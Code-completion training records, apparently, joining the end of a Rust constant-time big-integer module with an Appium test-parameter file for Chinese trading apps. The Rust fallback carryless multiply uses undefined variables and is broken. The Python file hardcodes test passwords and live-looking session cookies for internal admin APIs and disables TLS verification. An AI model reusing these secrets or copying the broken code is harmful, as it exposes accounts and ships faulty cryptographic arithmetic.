assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..self.value.len() {
let a = u64_to_m128i(self.value[i] as u64);
for j in 0..rhs.value.len() {
let b = u64_to_m128i(rhs.value[j] as u64);
let r = u64_from_m128i(unsafe { _mm_clmulepi64_si128(a, b, 0) });
let rl = r as u32;
let rh = (r >> 32) as u32;
// Add to output
out.value[i + j] ^= rl;
out.value[i + j + 1] ^= rh;
}
}
}
// TODO: Finish making this constant time and correct.
#[cfg(not(all(target_arch = "x86_64", target_feature = "pclmulqdq")))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..b.value_bits() {
out.xor_assign_if(b.bit(i) == 1, &a);
a.shl();
}
}
// TODO: Move to a shared utility.
pub fn to_string_radix(&self, radix: u32) -> alloc::string::String {
// TODO: These should be global constants (as well as one)
let zero = Self::from_usize(0, self.bit_width());
let div = Self::from_usize(radix as usize, 32);
let mut s = alloc::string::String::new();
let mut tmp = self.clone();
while tmp > zero {
// TODO: We can divide by a larger power of 10 to make this more efficient.
let (q, r) = tmp.quorem(&div);
tmp = q;
// TODO: Very inefficient
s.insert(
0,
core::char::from_digit(r.value.first().cloned().unwrap_or(0), radix).unwrap(),
);
}
if s.len() == 0 {
s.push('0');
}
s
}
/// Resets the value of the integer to 0.
pub fn assign_zero(&mut self) {
for v in self.value.iter_mut() {
*v = 0;
}
}
/// In-place increases the size
pub fn extend(&mut self, bit_width: usize) {
let new_len = ceil_div(bit_width, BASE_BITS);
assert!(new_len >= self.value.len());
self.value.resize(new_len, 0);
}
pub fn from_str(s: &str, bit_width: usize) -> common::errors::Result<Self> {
let ten = SecureBigUint::from_usize(10, 32);
let mut out = Self::from_usize(0, bit_width);
for c in s.chars() {
let digit = c
.to_digit(10)
.ok_or(common::errors::err_msg("Invalid digit"))?;
let tmp = out.clone();
ten.mul_to(&tmp, &mut out);
out += SecureBigUint::from_usize(digit as usize, bit_width);
// out = (&out * &ten) + &(digit as usize).into();
}
Ok(out)
}
}
impl core::fmt::Display for SecureBigUint {
fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result {
write!(f, "{}", self.to_string_radix(10))
}
}
impl Ord for SecureBigUint {
fn cmp(&self, other: &Self) -> Ordering {
let mut less = 0;
let mut greater = 0;
let n = core::cmp::max(self.value.len(), other.value.len());
for i in (0..n).rev() {
let mask = !(less | greater);
let a = self.value.get(i).cloned().unwrap_or(0);
let b = other.value.get(i).cloned().unwrap_or(0);
if a < b {
less |= mask & 1;
} else if a > b {
greater |= mask & 1;
}
}
let cmp = (less << 1) | greater;
let mut out = Ordering::Equal;
// Exactly one of these if statements should always be triggered.
if cmp == 0b10 {
out = Ordering::Less;
}
if cmp == 0b01 {
out = Ordering::Greater;
}
if cmp == 0b00 {
out = Ordering::Equal;
}
out
}
}
impl PartialEq for SecureBigUint {
fn eq(&self, other: &Self) -> bool {
self.cmp(other) == Ordering::Equal
}
}
impl Eq for SecureBigUint {}
impl PartialOrd for SecureBigUint {
fn partial_cmp(&self, other: &Self) -> Option<Ordering> {
Some(self.cmp(other))
}
}
impl_op_ex!(+= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::add_assign(lhs, rhs)
});
impl_op_commutative!(+ |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
// NOTE: Does not use add_into to avoid risking an overflow.
Integer::add(&lhs, rhs)
});
impl_op!(+ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
Integer::add(lhs, rhs)
});
impl_op_ex!(-= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::sub_assign(lhs, rhs)
});
impl_op_ex!(-|lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { lhs.sub_into(rhs) });
impl_op!(-|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::sub(lhs, rhs) });
impl_op_ex!(
*|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::mul(lhs, rhs) }
);
impl_op_ex!(/ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (q, _) = lhs.quorem(rhs);
q
});
impl_op!(% |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op!(% |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op_ex!(^= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
assert_eq!(lhs.value.len(), rhs.value.len());
for (lhs_value, rhs_value) in lhs.value.iter_mut().zip(rhs.value.iter()) {
*lhs_value ^= *rhs_value;
}
});
impl_op_ex!(^ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
assert_eq!(lhs.value.len(), rhs.value.len());
let mut out = SecureBigUint::from_usize(0, lhs.bit_width());
for i in 0..out.value.len() {
out.value[i] = lhs.value[i] ^ rhs.value[i];
}
out
});
#[cfg(test)]
mod tests {
use super::*;
use core::str::FromStr;
#[test]
fn secure_biguint_test() {
// TODO: Check multiplication in x*0 and x*1 cases
let seven = SecureBigUint::from_usize(7, 64);
let one_hundred = SecureBigUint::from_usize(100, 64);
assert!(one_hundred > seven);
assert!(seven < one_hundred);
assert!(one_hundred == one_hundred);
assert!(seven == seven);
let mut seven_hundred = SecureBigUint::from_usize(0, 64);
seven.mul_to(&one_hundred, &mut seven_hundred);
assert!(seven_hundred == SecureBigUint::from_usize(700, 64));
let x = SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff]);
let mut temp = SecureBigUint::from_usize(0, 64);
x.mul_to(&x, &mut temp);
assert_eq!(
&temp.to_le_bytes(),
&(core::u32::MAX as u64).pow(2).to_le_bytes()
);
let (q, r) = temp.quorem(&x);
// Equal to 'x' extended to 64 bits
assert!(q == SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0]));
assert!(r == SecureBigUint::from_usize(0, 32));
let (q, r) = one_hundred.quorem(&seven);
assert!(q == SecureBigUint::from_usize(14, 64));
assert!(r == SecureBigUint::from_usize(2, 64));
let (q, r) = seven.quorem(&one_hundred);
assert!(q == SecureBigUint::from_usize(0, 64));
assert!(r == SecureBigUint::from_usize(7, 64));
// TODO: Test larger numbers.
}
#[test]
fn shr_n_test() {
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0b00001010, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(8);
assert_eq!(&v.to_be_bytes(), &[0, 0b00010100, 0, 0]);
}
// Testing moving values across bases.
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(32);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00010100, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(34);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00000101, 0, 0, 0]);
}
// Carry to second base.
{
let mut v = SecureBigUint::from_be_bytes(&[0, 0, 0, 1, 0, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b10000000, 0, 0, 0]);
}
}
}
| shr_n | identifier_name |
Parameter.py | # -*- coding: utf-8 -*-
import unittest
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException
from random import Random
from datetime import datetime
import unittest, time, re, os
import json
import requests
import csv
random = Random()
#=========UAT/PRD切換測試需更改之參數========
# 指定OS
OS = 'Windows'
#UAT
#package_name = 'com.szoc.zb.cs'
#PRD
#package_name = 'com.gwtsz.gts2.cf'
#cf2
package_name = 'com.gwtsz.gts2.cf2'
#cf3
#package_name = 'com.gwtsz.gts2.cf3'
#專案目錄
dir_path = os.path.dirname(os.path.realpath(__file__))
#包為PRD
if(package_name == 'com.gwtsz.gts2.cf'):
#指定apk路徑
apk_url = dir_path + '/release-cf-1.8.5-release_185_jiagu_sign_zp.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '创富CFD V_1.8.5'
#關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
#登入帳戶
main_user_id = '81135805'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#包為UAT
elif(package_name == 'com.szoc.zb.cs'):
#指定apk路徑
apk_url = dir_path + '/2021-02-17-uat-cs-1.8.6-release.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = 'ISTONE V_1.8.3'
#關於創 |
about_us_expect = '关于创富'
#登入帳戶
main_user_id = '81134740'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#包為CF3
else:
# 指定apk路徑
apk_url = dir_path + 'release-cf3-1.8.5-release_185_jiagu_sign_zp-update&utm_medium=bycfd.apk'
# 應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '白银交易平台 V_1.8.5'
# 關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
# 登入帳戶
main_user_id = '81134740'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#=========UAT/PRD切換測試需更改之參數========
account_csv = '帳號列表.csv'
#指定舊版本apk路徑(覆蓋安裝測試)
#old_apk_url = 'C:/Users/Angela/72apptest/20200812-uat-cs-1.8.2-release.apk'
#指定裝置、版本、安裝包
#每次開啟不重置app
desired_caps = {
#'platformName':'Android',
#'platformVersion':'5.1.1',
#'deviceName':'Android Emulator',
'platformName':'Android',
'platformVersion':'10',
'deviceName':'Mi 9t',
'appPackage': package_name,
'appActivity':'gw.com.android.ui.WelcomeActivity',
'newCommandTimeout':6000,
'noReset':True
}
#每次開啟重置app
desired_caps_reset = {
'platformName':desired_caps['platformName'],
'platformVersion':desired_caps['platformVersion'],
'deviceName':desired_caps['deviceName'],
'appPackage':desired_caps['appPackage'],
'appActivity':desired_caps['appActivity'],
'newCommandTimeout':desired_caps['newCommandTimeout'],
'noReset':False
}
#不啟動app,開桌面
desired_install = {
'platformName':desired_caps['platformName'],
'platformVersion':desired_caps['platformVersion'],
'deviceName':desired_caps['deviceName'],
}
Remote_url = 'http://localhost:4723/wd/hub'
#檢查app是否安裝,若沒安裝則自動安裝
def check_app_installed():
driver_install = webdriver.Remote(Remote_url, desired_install)
if(driver_install.is_app_installed(desired_caps['appPackage'])):
print('APP已經安裝')
else:
driver_install.install_app(apk_url)
print('APP安裝完畢')
driver_install.quit()
#跳過廣告
def skip_ads(self):
time.sleep(12)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
#跳過廣告(不等開屏七秒)
def skip_ads_no_wait(self):
#設置隱性等待2秒
self.driver.implicitly_wait(2)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
self.driver.implicitly_wait(10)
#跳過文字彈窗
def skip_pop_ups_dialog(self):
try:
#點擊文字彈窗
self.driver.find_element_by_xpath("//*[@text='立即前往']").click()
time.sleep(2)
#關閉文字彈窗H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
except NoSuchElementException:
pass
#點允許(在app內時)
def click_allow(self):
try:
self.driver.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
#點允許(不在app內時)
def click_allow_outside_app():
driver_allow = webdriver.Remote(Remote_url, desired_install)
try:
driver_allow.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
driver_allow.quit()
#點擊我的頁面
def press_my_button(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.9, y=y-1, count=1).perform()
#element = self.driver.find_element_by_id('com.gwtsz.gts2.cf:id/radio_button_text').find_element_by_xpath("//*[@text='我的']")
#element.click()
#行情tab
def click_quotation(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[2]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#交易tab
def click_transaction(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[3]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#取得真實帳號資訊
def get_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
#取得帳號級別
account_lvl = self.driver.find_element_by_id(package_name+":id/dialog_content_text3").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num,account_lvl
#取得模擬帳號資訊
def get_demo_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num
#關閉分享彈窗
def close_share_window(self):
self.driver.find_element_by_id(package_name+":id/btn_cancel").click()
#點擊首頁消息中心
def click_home_message_center(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.81 ,y=y/19, count=1).perform()
#透過id
#self.driver.find_element_by_id('com.szoc.zb.cs:id/message_btn2').click()
#點擊首頁客服中心
def click_home_customer_service(self):
#透過id
#self.driver.find_element_by_id(package_name+':id/contact_btn2').click()
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.93 ,y=y/19, count=1).perform()
#點擊我頁面設置
def click_mypage_setting(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_setting").click()
#點擊我頁面消息中心
def click_mypage_message_center(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_message").click()
#點擊消息中心的返回
def click_message_center_return(self):
el2 = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.RelativeLayout/android.widget.LinearLayout[1]/android.widget.ImageView")
el2.click()
#點擊我頁面在線客服
def click_mypage_customer_service(self):
self.driver.find_element_by_id(package_name+":id/rl_user_center_live").click()
#點擊我頁面切換真實模擬
def click_mypage_switch_account(self):
self.driver.find_element_by_id(package_name+":id/tv_real_demo_switch").click()
#點擊我頁面存款
def click_mypage_deposit(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_deposit").click()
#點擊我頁面取款
def click_mypage_withdraw(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_withdraw").click()
#點擊我頁面資金明細
def click_mypage_funding_details(self):
self.driver.find_element_by_xpath("//*[@text='资金明细']").click()
#點擊首頁
def press_home_tab(self):
self.driver.find_element_by_xpath("//*[@text='首页']").click()
#點擊首頁輪播廣告
def click_home_banner(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
for i in range(3):
#點擊座標
TouchAction(self.driver).tap(element=None, x=x/2 ,y=y/5, count=1).perform()
#點擊首頁登入/註冊
def click_home_register_login(self):
#做標定位只適用螢幕大小 2340*1080
#TouchAction(self.driver).tap(x=931, y=2149).perform()
#文字定位全部適用,但定位時間較久
self.driver.find_element_by_xpath("//*[@text='登录/注册']").click()
def click_home_real_account(self):
#TouchAction(self.driver).tap(x=750, y=1300).perform()
while True:
try:
#點擊首頁開立真實賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_two").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
def click_home_demo_account(self):
#TouchAction(self.driver).tap(x=250, y=1300).perform()
while True:
try:
#點擊首頁開立模擬賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_one").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
#點擊開戶
def click_login_create_account(self):
self.driver.find_element_by_id(package_name+":id/open_account_button").click()
#點擊模擬開戶
def click_create_demo_account(self):
self.driver.find_element_by_id(package_name+":id/main_top_right_tab").click()
#關閉H5
def close_html5(self):
#關閉H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
#往下滑
def scroll_down(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
x1=x/2
y1=y*0.8
y2=y*0.3
#TouchAction(self.driver).press(x=x1, y=y1).move_to(x=x1, y=y2).release().perform()
self.driver.swipe(x1,y1,x1,y2,1000)
#懂你所需左滑
def clever_need_swipe_left(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x1 = x*0.72
x2 = x*0.6
self.driver.swipe(x1,y1,x2,y1,1000)
#懂你所需右滑
def clever_need_swipe_right(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x2 = x*3/4
x1 = x/4
self.driver.swipe(x1,y1,x2,y1,1000)
#隨機產生密碼
def generate_random_password(self):
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqstuvwxyz0123456789'
length = len(chars) - 1
random_password = ''
for i in range(random.randint(6,8)):
random_password+=chars[random.randint(0,length)]
random_password+=str(random.randint(0,9))
return random_password
#隨機產生電話
def random_phone_number(self):
area_list = ['130', '131', '132', '133', '134', '135', '136', '137',
'138', '139', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159','188','189']
numbers = '0123456789'
random_phone = random.choice(area_list)
for i in range(8):
random_phone+=numbers[random.randint(0,9)]
return random_phone
#隨機產生中文名
def random_chinese_name(self):
#隨機中文名
random_name = '測試'
for i in range(2):
random_name += chr(random.randint(0x4e00, 0x9fbf))
return random_name
#產生身分證API
'''def user_id_card_api(self):
request_url = "https://www.googlespeed.cn/idcard/ajax_get_idcard"
years = str(random.randint(1940,2001))
month = str(random.randint(1,12))
days = str(random.randint(1,30))
if(len(month)==1):
month = '0'+month
if(len(years)==1):
years = '0'+years
if(len(days)==1):
days = '0'+days
payload = {'sex': random.choice(['男','女']),
'year': years,
'month': month,
'day': days}
response = requests.request("POST", request_url, headers={}, data = payload)
data = response.json()
return data['id_list'][0]['id_card']'''
#獲取驗證碼API
def register_demo_account_api(self,random_phone):
if(package_name == 'com.szoc.zb.cs'):
request_url = "http://mis.will68.com/ValidateCodeLog/createValidateNo"
payload = random_phone
headers = {
'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; JSESSIONID=6E3FAB6D7BD7F37DC94282001269EB03; lang_type=0; cf88_id="user:1:3dce2613-06a3-45b3-ad00-6ba6f75d79a3"',
'Content-Type': 'text/plain'
}
response = requests.request("POST", request_url, headers=headers, data = payload)
data = response.json()
#回傳驗證碼
return data['data']
else:
request_url = "https://office.cf139.com/ValidateCodeLog/createValidateNo"
payload = random_phone
headers = {
'Connection': 'close',
'authority': 'office.cf139.com',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1',
'content-type': 'application/json;charset=UTF-8',
'origin': 'https://office.cf139.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://office.cf139.com/home/validater/validateNo',
'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie': 'lang_type=0; JSESSIONID=84871DBC50AD6CCE38923B5F4F7FC5DF; cf88_id="user:763:869480c1-ce0e-4232-9a65-65b9336b2cec"'
}
response = requests.request("POST", request_url, headers=headers, data = payload,verify = False)
#print(response.text.encode('utf8'))
data = response.json()
#回傳驗證碼
return data['data']
#添加白名單API
def White_List_API(self,random_phone):
if(package_name == 'com.szoc.zb.cs'):
request_url = "http://mis.will68.com/whitelists/edit"
payload = "{\"status\": 1, \"phone\": \""+random_phone+"\"}"
headers = {
'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; lang_type=0; JSESSIONID=C3883C50852D325D183B1E41F2DC8EF3; cf88_id="user:1:e7b99c9d-3916-461a-8d2d-975f7eeb18d7"',
'Content-Type': 'application/json'
}
response = requests.request("POST", request_url, headers=headers, data = payload)
data = response.json()
print('添加白名單結果為:',data['msg'])
else:
request_url = "https://office.cf139.com/whitelists/edit"
seconds = str(int(time.time()))
#payload = "{\"status\":1,\"remark\":\"YoYo-自動測試\",\"phone\":\""+random_phone+"\"}"
payload = "{\"phone\":\""+random_phone+"\",\"createTime\":1608542350760,\"ip\":\"\",\"updateTime\":"+seconds+",\"remark\":\"YoYo-自動測試\",\"id\":1593,\"idNumber\":\"\",\"email\":\"\",\"status\":1}"
headers = {
'authority': 'office.cf139.com',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'content-type': 'application/json;charset=UTF-8',
'origin': 'https://office.cf139.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://office.cf139.com/home/whitelist/index',
'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie': 'JSESSIONID=B9F4F676CC7B8728FF5EB497C6CA6FF1; cf88_id="user:763:99919735-b166-41db-bc21-fdd84d0c6734"; lang_type=0'
}
response = requests.request("POST", request_url, headers=headers, data = payload.encode("utf-8").decode("latin1"),verify = False)
#print(response.text.encode('utf8'))
data = response.json()
#回傳驗證碼
return data['data']
#登入
def Login(self):
try:
#點登錄註冊
click_home_register_login(self)
el1 = self.driver.find_element_by_id(package_name+":id/loginnameEditText")
el1.clear()
el1.send_keys(main_user_id)
el2 = self.driver.find_element_by_id(package_name+":id/password")
el2.clear()
el2.send_keys(main_user_password)
el3 = self.driver.find_element_by_id(package_name+":id/sign_in_button")
el3.click()
#跳廣告
skip_ads_no_wait(self)
except NoSuchElementException:
print('已登入...\n')
#登出
def Logout(self):
#切至我的頁面
press_my_button(self)
#點擊設置
el1 = self.driver.find_element_by_id(package_name+":id/iv_user_center_setting")
el1.click()
#退出登錄
el2 = self.driver.find_element_by_xpath("//*[@text='退出登录']")
el2.click()
#確認
el3 = self.driver.find_element_by_id(package_name+":id/action_btn_pos")
el3.click()
def check_new_account_login(self,account_type,password,random_phone):
#當前時間
current_time = datetime.now().isoformat()
if(account_type=='真實'):
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num,account_lvl = get_account_information(self)
print('開戶成功!帳號為:'+account_num,'級別為:'+account_lvl)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,account_lvl,current_time,package_name]
writed_csv.append(account_information)
# 寫入CSV
writer.writerows(writed_csv)
else:
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num = get_demo_account_information(self)
print('開戶成功!帳號為:'+account_num)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,'',current_time,package_name]
writed_csv.append(account_information)
#寫入CSV
writer.writerows(writed_csv)
| 富(用於關於創富檢查)
about_us_expect = '关于神龙科技'
#登入帳戶
main_user_id = '81018322'
main_user_demo_id = '11002074'
main_user_password = 'abc123'
#包為CF2
elif(package_name == 'com.gwtsz.gts2.cf2'):
#指定apk路徑
apk_url = dir_path + '/20201120-prd-cf2-1.8.3-release.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '柯洛夫黃金平台 V_1.8.6'
#關於創富(用於關於創富檢查) | conditional_block |
Parameter.py | # -*- coding: utf-8 -*-
import unittest
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException
from random import Random
from datetime import datetime
import unittest, time, re, os
import json
import requests
import csv
random = Random()
#=========UAT/PRD切換測試需更改之參數========
# 指定OS
OS = 'Windows'
#UAT
#package_name = 'com.szoc.zb.cs'
#PRD
#package_name = 'com.gwtsz.gts2.cf'
#cf2
package_name = 'com.gwtsz.gts2.cf2'
#cf3
#package_name = 'com.gwtsz.gts2.cf3'
#專案目錄
dir_path = os.path.dirname(os.path.realpath(__file__))
#包為PRD
if(package_name == 'com.gwtsz.gts2.cf'):
#指定apk路徑
apk_url = dir_path + '/release-cf-1.8.5-release_185_jiagu_sign_zp.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '创富CFD V_1.8.5'
#關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
#登入帳戶
main_user_id = '81135805'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#包為UAT
elif(package_name == 'com.szoc.zb.cs'):
#指定apk路徑
apk_url = dir_path + '/2021-02-17-uat-cs-1.8.6-release.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = 'ISTONE V_1.8.3'
#關於創富(用於關於創富檢查)
about_us_expect = '关于神龙科技'
#登入帳戶
main_user_id = '81018322'
main_user_demo_id = '11002074'
main_user_password = 'abc123'
#包為CF2
elif(package_name == 'com.gwtsz.gts2.cf2'):
#指定apk路徑
apk_url = dir_path + '/20201120-prd-cf2-1.8.3-release.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '柯洛夫黃金平台 V_1.8.6'
#關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
#登入帳戶
main_user_id = '81134740'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#包為CF3
else:
# 指定apk路徑
apk_url = dir_path + 'release-cf3-1.8.5-release_185_jiagu_sign_zp-update&utm_medium=bycfd.apk'
# 應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '白银交易平台 V_1.8.5'
# 關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
# 登入帳戶
main_user_id = '81134740'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#=========UAT/PRD切換測試需更改之參數========
account_csv = '帳號列表.csv'
#指定舊版本apk路徑(覆蓋安裝測試)
#old_apk_url = 'C:/Users/Angela/72apptest/20200812-uat-cs-1.8.2-release.apk'
#指定裝置、版本、安裝包
#每次開啟不重置app
desired_caps = {
#'platformName':'Android',
#'platformVersion':'5.1.1',
#'deviceName':'Android Emulator',
'platformName':'Android',
'platformVersion':'10', | 'noReset':True
}
#每次開啟重置app
desired_caps_reset = {
'platformName':desired_caps['platformName'],
'platformVersion':desired_caps['platformVersion'],
'deviceName':desired_caps['deviceName'],
'appPackage':desired_caps['appPackage'],
'appActivity':desired_caps['appActivity'],
'newCommandTimeout':desired_caps['newCommandTimeout'],
'noReset':False
}
#不啟動app,開桌面
desired_install = {
'platformName':desired_caps['platformName'],
'platformVersion':desired_caps['platformVersion'],
'deviceName':desired_caps['deviceName'],
